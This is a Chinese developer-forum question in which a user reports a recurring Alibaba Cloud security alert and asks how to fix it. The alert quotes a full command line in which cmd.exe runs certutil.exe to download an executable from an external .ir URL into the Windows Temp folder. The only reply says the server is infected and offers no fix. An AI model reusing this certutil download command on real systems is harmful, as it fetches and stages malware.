开发者社区 问答 正文

阿里云服务器总是报恶意下载 利用certutil.exe,怎么处理?

该告警由如下引擎检测发现: 父进程路径:C:/Windows/System32/cmd.exe 父进程命令行:cmd.exe /c certutil.exe -urlcache -split -f http://UeR.ReiyKiQ.ir/download.exe C:\Windows/Temp/ulxxghabqdnewpe11957.exe 父进程id:3780 进程ID:3124 URL链接:http://uer.reiykiq.ir/download.exe 进程路径:C:/Windows/System32/certutil.exe 命令行参数:certutil.exe -urlcache -split -f http://UeR.ReiyKiQ.ir/download.exe C:\Windows/Temp/ulxxghabqdnewpe11957.exe 与该URL有关联的漏洞:None

尝试了很多办法,过几天就又报这个问题,怎么解决?

展开
收起
1837197565457235 2020-08-04 14:20:16 2212 分享 版权

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

1 条回答
写回答
取消 提交回答
  • huc_逆天
    技术架构师 阿里云开发者社区技术专家博主 CSDN签约专栏技术博主 掘金签约技术博主 云安全联盟专家 众多开源代码库Commiter

    中毒了啊

    2020-08-20 18:32:25
    赞同 展开评论
问答分类:
安全 Windows 云服务器 ECS
问答地址:
开发者社区 > 安全 > 问答
相关问答
this xml file does not appear to have any style in
48032
10
0
请问下 我访问接口不通 什么原因 Provisional headers are shown
1754
0
0
购买阿里国外的云服务器是否可以访问谷歌?
80502
47
0
通过www和不带www的网址输入最终都指向www.我的域名.com,求指教
124285
28
0
OSS的endpoint如何查看
36243
6
0
sql server的用户名和密码怎么查啊?
35555
21
0
配置了安全组规则,端口还是无法访问
32271
25
0
设置域名解析如何指向我的服务器url包括端口号
17594
2
0
域名在腾讯云备案成功,解析到阿里云服务器,提示仍需备案?
59509
30
0
Connection reset by peer的常见原因及解决办法
3782
1
0